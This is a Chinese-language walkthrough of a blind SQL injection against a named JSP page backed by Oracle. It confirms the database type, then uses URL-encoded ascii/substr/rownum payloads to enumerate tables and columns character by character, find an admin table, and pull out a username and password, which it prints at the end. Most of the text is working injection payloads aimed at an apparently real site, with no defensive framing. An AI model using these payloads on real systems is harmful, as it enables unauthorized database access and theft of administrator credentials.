1 web/cxview.jsp?id=14499 支持注释-- 不支持;

2 and (select count(1) from sysobjects)%3E0 and 1=1 出错,基本判断是oralce数据库

3 web/cxview.jsp?id=14499 and (select count(table_name) from user_tables)%3E0 and 1=1 显示正常,确定是oracle数据库。

order by 1 正常,order by 2 出错,只有一个字段。

但是郁闷是。。。

and 1=2 union select null from dual 出错

union all select null from dual-- 同样出错 可能不存在dual

and exist (select * from dual) 出错
判断表的字符长度:and (select length(count(*)) from user_tables)=2 and 1=1 如,10条就是两位=2

猜表的记录字符:第一位,and (select ascii(substr(count(*),1,1)) from user_tables)%3E64 and 1=1

and (select ascii(substr(count(*),2,1)) from user_tables)%3E64 and 1=1 第二位

继续换,最后第一位是3,第二位是5,得出总共有35个表

第一个表的长度: and (select length(table_name) from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum%3C=1 order by 1 desc) t where r%3E1-1 order by 1)t)=5 and 1=1

第一个表第一位是acc: and (select ascii(substr(table_name,1N位改这个1,1)) from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum%3C=1 order by 1 desc) t where r%3E1-1 order by 1)t)%3C=256 and 1=1

2个表第一位是acc:

and (select ascii(substr(table_name,1,1)) from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum%3C=2 order by 1 desc) t where r%3E2-1 order by 1)t)%3C=256 and 1=1

admin表的列:

判断有几列:

and (select length(count(*)) from user_tab_columns where table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78))=2 and 1=1 列记录数是两位数 %7C%7C=||

chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78)=A||D||M||I||N

第二位是:

and (select ascii(substr(count(*),2,1)) from user_tab_columns where table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78))=49 and 1=1 ascii=49

第一位也是ascii=49 就是1,得出总共有11列:

第一列的长度:

and (select length(column_name) from (select rownum r,column_name from (select rownum r,column_name from user_tab_columns where rownum%3C=1 and table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78) order by 1 desc) t where r%3E1-1 order by 1)t)%3C=32 and 1=1

第二列长度:只要改:rownum%3C=1 where r%3E1-1 这两处,意思是,rownum<=1 r>1-1 第二列当然就是

rownum%3C=2 where r%3E2-1

第一列第一位:

and (select ascii(substr(column_name,1,1)) from (select rownum r,column_name from (select rownum r,column_name from user_tab_columns where rownum%3C=1 and table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78) order by 1 desc) t where r%3E1-1 order by 1)t)%3E88 and 1=1

第二列第一位:同上改两处 rownum%3C=1 where r%3E1-1 N位改:(column_name,N,1)

最后结果到到:usernamepassword 其他一般就不用去猜了。

接下来就是爆内容了:

同样先判断下有几个记录:

and (select length(count(*)) from admin where 1=1)=3 and 1=1 正常,说明是三位数的

记录第一位ascii:and (select ascii(substr(count(*),1,1)) from admin where 1=1)%3C=256 and 1=1

得出三位ascii码分别是54 51 55 637条记录

猜字段username的内容:

先猜长度看有几位

and (select length(username) from (select rownum r,username from (select rownum r,username from admin where rownum%3C=1 and 1=1 order by 1 desc) t where r%3E1-1 order by 1)t)=4 and 1=1

这里是4个字节

一般情况长度不会超过10个字节,如果超过加上count()函数来猜是几位的,再一位一位猜出是多少就知道长度了,其他表和列的长度数据也可以。

如: and (select length(count(username)) from (select rownum r,username from (select rownum r,username from admin where rownum%3C=1 and 1=1 order by 1 desc) t where r%3E1-1 order by 1)t)=1 and 1=1 一般不超过9就是一位,超过就改成=2试试!

字段username的第一位ascii码:

and (select ascii(substr(username,1,1)) from (select rownum r,username from (select rownum r,username from admin where rownum%3C=1 and 1=1 order by 1 desc) t where r%3E1-1 order by 1)t)%3C=256 and 1=1

第几条记录的第几位只需要改上面红字的就行;原理同上。

密码同理,只要把username这个字段换成密码字段就可以,这里换成password

最后结果是。 username:dhbg pwd:1236